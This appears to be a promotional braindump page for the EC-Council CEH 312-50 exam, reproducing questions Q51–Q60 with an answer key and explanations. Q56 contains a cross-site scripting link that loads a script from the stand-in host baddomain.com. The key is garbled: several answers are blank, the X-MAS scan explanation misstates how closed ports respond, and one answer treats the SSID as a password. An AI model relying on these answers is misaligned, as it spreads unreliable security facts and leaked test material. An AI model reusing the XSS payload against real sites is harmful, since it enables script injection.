Top Leading 312-50 free question Reviews!

Cause all that matters here is passing the EC-Council 312-50 exam. Cause all that you need is a high score of 312-50 Ethical Hacking and Countermeasures (CEHv6) exam. The only one thing you need to do is downloading Pass4sure 312-50 exam study guides now. We will not let you down with our money-back guarantee.


The article at Testaimer.com going over http://www.testaimer.com/312-50-test is very comprehensive.

Q51. Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. 

Choose the attack type from the choices given below. 

A. Database Fingerprinting 

B. Database Enumeration 

C. SQL Fingerprinting 

D. SQL Enumeration 

Answer: A

Explanation: He is trying to create a view of the characteristics of the target database, he is taking it’s fingerprints. 


Q52. What is the proper response for a X-MAS scan if the port is open? 

A. SYN 

B. ACK 

C. FIN 

D. PSH 

E. RST 

F. No response 

Answer:

Explanation: Closed ports respond to a X-MAS scan by ignoring the packet. 


Q53. How does a denial-of-service attack work? 

A. A hacker tries to decipher a password by using a system, which subsequently crashes the network 

B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person 

C. A hacker prevents a legitimate user (or group of users) from accessing a service 

D. A hacker uses every character, word, or letter he or she can think of to defeat authentication 

Answer: C

Explanation: In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB). 


Q54. Which of the following is true of the wireless Service Set ID (SSID)? (Select all that apply.) 

A. Identifies the wireless network 

B. Acts as a password for network access 

C. Should be left at the factory default setting 

D. Not broadcasting the SSID defeats NetStumbler and other wireless discovery tools 

Answer: AB


Q55. SSL has been as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A to Point B? 

A. SSL is redundant if you already have IDS’s in place 

B. SSL will trigger rules at regular interval and force the administrator to turn them off 

C. SSL will make the content of the packet and Intrusion Detection System are blinded 

D. SSL will slow down the IDS while it is breaking the encryption to see the packet content 

Answer:

Explanation: An IDS will not be able to evaluate the content in the packets if it is encrypted. 


Q56. This is an attack that takes advantage of a web site vulnerability in which the site displays content that includes un-sanitized user-provided data. 

<ahref="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js %22%3E%3C/script%3E">See foobar</a> 

What is this attack? 

A. Cross-site-scripting attack 

B. SQL Injection 

C. URL Traversal attack 

D. Buffer Overflow attack 

Answer: A


Q57. What is a NULL scan? 

A. A scan in which all flags are turned off 

B. A scan in which certain flags are off 

C. A scan in which all flags are on 

D. A scan in which the packet size is set to zero 

E. A scan with a illegal packet size 

Answer:

Explanation: A null scan has all flags turned off. 


Q58. Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session? 

A. Dan cannot spoof his IP address over TCP network 

B. The server will send replies back to the spoofed IP address 

C. Dan can establish an interactive session only if he uses a NAT 

D. The scenario is incorrect as Dan can spoof his IP and get responses 

Answer:

Explanation: Spoofing your IP address is only effective when there is no need to establish a two way connection as all traffic meant to go to the attacker will end up at the place of the spoofed address. 


Q59. How do you defend against ARP spoofing? 

A. Place static ARP entries on servers, workstation and routers 

B. True IDS Sensors to look for large amount of ARP traffic on local subnets 

C. Use private VLANS 

D. Use ARPWALL system and block ARP spoofing attacks 

Answer: ABC 

Explanation: ARPWALL is a opensource tools will give early warning when arp attack occurs. 

This tool is still under construction. 


Q60. A rootkit is a collection of tools (programs) that enable administrator-level access to a computer. This program hides itself deep into an operating system for malicious activity and is extremely difficult to detect. The malicious software operates in a stealth fashion by hiding its files, processes and registry keys and may be used to create a hidden directory or folder designed to keep out of view from a user's operating system and security software. 

What privilege level does a rootkit require to infect successfully on a Victim's machine? 

A. User level privileges 

B. Ring 3 Privileges 

C. System level privileges 

D. Kernel level privileges 

Answer: D